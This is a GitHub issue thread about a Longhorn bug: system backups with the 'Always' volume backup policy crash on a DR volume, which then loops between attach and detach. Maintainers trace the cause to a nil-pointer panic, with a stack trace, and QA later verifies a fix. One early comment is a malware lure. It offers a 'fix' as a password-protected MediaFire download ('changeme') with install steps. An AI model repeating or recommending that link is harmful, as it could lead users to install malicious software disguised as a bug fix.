### ISSUE TITLE
[BUG] System Backup Fails and DR Volume Enters Attach-Detach Loop When Volume Backup Policy is Set to `Always`

### ISSUE THREAD

**Issue by roger-ryao** [longhorn/longhorn#9330]
## Describe the bug

When performing a system backup with the Volume Backup Policy set to [Always], the backup process fails if there is a DR volume present. Additionally, the DR volume enters a continuous attach-detach loop, which is unexpected behavior. We expect that the system backup process should skip DR volumes when the Volume Backup Policy is set to [Always], ensuring that the system backup completes successfully without affecting the DR volume's state.

## To Reproduce

1. Create a volume named `vol-0` and write some data to it.
2. Perform a backup of `vol-0`.
3. Create a DR volume named `vol-1` from the backup of `vol-0`, but do not activate `vol-1`.
4. Create a system backup with Volume Backup Policy set to `Always`.

## Expected behavior

- The system backup should complete successfully.
- DR volumes should be skipped during the backup process.
- The DR volume (vol-1) should maintain a stable state.

## Support bundle for troubleshooting

[supportbundle_5f0d6bf4-f020-4722-9d53-4a3eefe5bb83_2024-08-28T07-27-25Z.zip](https://github.com/user-attachments/files/16778282/supportbundle_5f0d6bf4-f020-4722-9d53-4a3eefe5bb83_2024-08-28T07-27-25Z.zip)

## Environment

 - Longhorn version: `v1.7.1-rc1` 
 - Impacted volume (PV): `vol-1`
 - Installation method (e.g. Rancher Catalog App/Helm/Kubectl): `Kubectl`
 - Kubernetes distro (e.g. RKE/K3s/EKS/OpenShift) and version:
   - Number of control plane nodes in the cluster: `1` 
   - Number of worker nodes in the cluster: `3`
 - Node config
   - OS type and version: ubuntu 24.04
   - Kernel version: 
   - CPU per node: `4 core`
   - Memory per node: 16 GB
   - Disk type (e.g. SSD/NVMe/HDD): SSD
   - Network bandwidth between the nodes (Gbps):
 - Underlying Infrastructure (e.g. on AWS/GCE, EKS/GKE, VMWare/KVM, Baremetal): 
 - Number of Longhorn volumes in the cluster: `2`

## Additional context

N/A

## Workaround and Mitigation

N/A

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by roger-ryao** [comment]
We can also observe the issue on `v1.7.0`, but I didn't observe it on `v1.6.x-head`.

**Comment by derekbit** [comment]
@c3y1huang Could you help check the issue? Thank you.

**Comment by roger-ryao** [comment]
> @roger-ryao is this verified by an auto test case? or manually tested?
> 
> Let's make sure we have an auto test for this. cc @longhorn/qa

I tested it manually.

**Comment by c3y1huang** [comment]
**Cause:**
```
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-instance-manager] time="2024-08-29T00:41:55Z" level=info msg="Snapshotting volume: snapshot system-backup-8393c12d8feb4bec" func="proxy.(*Proxy).VolumeSnapshot" file="snapshot.go:27" dataEngine=DATA_ENGINE_V1 engineName=longhorn-testvol-pjbedo-dr-e-0 serviceURL="10.42.3.30:10042" volumeName=longhorn-testvol-pjbedo-dr
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-testvol-pjbedo-dr-e-0] time="2024-08-29T00:41:55Z" level=info msg="Starting snapshot" func="controller.(*Controller).Snapshot" file="control.go:203" snapshot=system-backup-8393c12d8feb4bec volume=longhorn-testvol-pjbedo-dr
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-testvol-pjbedo-dr-e-0] panic: runtime error: invalid memory address or nil pointer dereference
[instance-manager-82332ae8f986b319add1c9811fa61637] [longhorn-testvol-pjbedo-dr-r-54616bb1] time="2024-08-29T00:41:55Z" level=warning msg="failed to handle data server" func="rpc.(*DataServer).listenAndServeTCP.func1" file="dataserver.go:62" error=EOF
[instance-manager-15573caeea554fa25f5850b3ceda493b] [signal SIGSEGV: segmentation violation code=0x1 addr=0x28 pc=0xacade8]
[instance-manager-15573caeea554fa25f5850b3ceda493b] 
[instance-manager-82332ae8f986b319add1c9811fa61637] [longhorn-testvol-pjbedo-dr-r-54616bb1] time="2024-08-29T00:41:55Z" level=warning msg="failed to handle data server" func="rpc.(*DataServer).listenAndServeTCP.func1" file="dataserver.go:62" error=EOF
[instance-manager-15573caeea554fa25f5850b3ceda493b] goroutine 1103 [running]:
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-testvol-pjbedo-dr-e-0] github.com/longhorn/longhorn-engine/pkg/controller.(*Controller).Snapshot(0xc0001b26e0, {0xc000116100?, 0x10a1d60?}, 0x0, 0x0)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/pkg/controller/control.go:216 +0x328
[instance-manager-15573caeea554fa25f5850b3ceda493b] github.com/longhorn/longhorn-engine/pkg/controller/rpc.(*ControllerServer).VolumeSnapshot(0x1dcd620?, {0x10a1d60?, 0xc0004fb930?}, 0x1de2480?)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/pkg/controller/rpc/server.go:140 +0x54
[instance-manager-15573caeea554fa25f5850b3ceda493b] github.com/longhorn/types/pkg/generated/enginerpc._ControllerService_VolumeSnapshot_Handler.func1({0x1634838?, 0xc0008ba7b0?}, {0x1036860?, 0xc0006fe730?})
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/github.com/longhorn/types/pkg/generated/enginerpc/controller_grpc.pb.go:445 +0xce
[instance-manager-15573caeea554fa25f5850b3ceda493b] github.com/longhorn/longhorn-engine/pkg/controller/rpc.GetControllerGRPCServer.WithIdentityValidationControllerServerInterceptor.identityValidationServerInterceptor.func1({0x1634838, 0xc0008ba7b0}, {0x1036860, 0xc0006fe730}, 0xc0005941a0, 0xc000738258)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/pkg/interceptor/interceptor.go:64 +0x823
[instance-manager-15573caeea554fa25f5850b3ceda493b] github.com/longhorn/types/pkg/generated/enginerpc._ControllerService_VolumeSnapshot_Handler({0x10a1d60, 0xc000064310}, {0x1634838, 0xc0008ba7b0}, 0xc000742180, 0xc00052d180)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/github.com/longhorn/types/pkg/generated/enginerpc/controller_grpc.pb.go:447 +0x143
[instance-manager-15573caeea554fa25f5850b3ceda493b] google.golang.org/grpc.(*Server).processUnaryRPC(0xc00077b000, {0x1634838, 0xc0008ba720}, {0x163a600, 0xc000552600}, 0xc0000e2240, 0xc0007ace40, 0x1de4dc8, 0x0)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/google.golang.org/grpc/server.go:1379 +0xdf8
[instance-manager-15573caeea554fa25f5850b3ceda493b] google.golang.org/grpc.(*Server).handleStream(0xc00077b000, {0x163a600, 0xc000552600}, 0xc0000e2240)
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/google.golang.org/grpc/server.go:1790 +0xe8b
[instance-manager-15573caeea554fa25f5850b3ceda493b] google.golang.org/grpc.(*Server).serveStreams.func2.1()
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/google.golang.org/grpc/server.go:1029 +0x8b
[instance-manager-15573caeea554fa25f5850b3ceda493b] created by google.golang.org/grpc.(*Server).serveStreams.func2 in goroutine 1264
[instance-manager-15573caeea554fa25f5850b3ceda493b]     /go/src/github.com/longhorn/longhorn-engine/vendor/google.golang.org/grpc/server.go:1040 +0x125
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-instance-manager] time="2024-08-29T00:41:55Z" level=info msg="Process Manager: process longhorn-testvol-pjbedo-dr-e-0 error out, error msg: exit status 2" func="process.(*Process).Start.func1" file="process.go:70"
[instance-manager-15573caeea554fa25f5850b3ceda493b] [longhorn-instance-manager] time="2024-08-29T00:41:55Z" level=warning msg="Process update: longhorn-testvol-pjbedo-dr-e-0: state error: errorMsg: exit status 2" func="process.(*Process).RPCResponse" file="process.go:115"
```
The NPE due to the DR volume disabled frontend and is triggered by [this line](https://github.com/longhorn/longhorn-engine/blob/v1.7.0/pkg/controller/control.go#L214) introduced in https://github.com/longhorn/longhorn-engine/commit/e39b7f0313b22d5c435ce57d1442800999a0f4ac

**Propose Fix:**
Skip creating DR volume backup.

**Comment by roger-ryao** [comment]
**Verified on vv1.8.0-dev-20240908 20240909**

- longhorn `v1.8.0-dev-20240908` https://github.com/longhorn/longhorn/commit/2ce609f871c89ef80bf3decc30b07225bed5288f
- longhorn-manager `v1.8.0-dev-20240908` https://github.com/longhorn/longhorn-manager/commit/e9e0a7f6da6c377ddb9f5f7f57138f4b4a54a000

**The test steps**
https://github.com/longhorn/longhorn/issues/9330#issue-2491341628

**Result Passed**
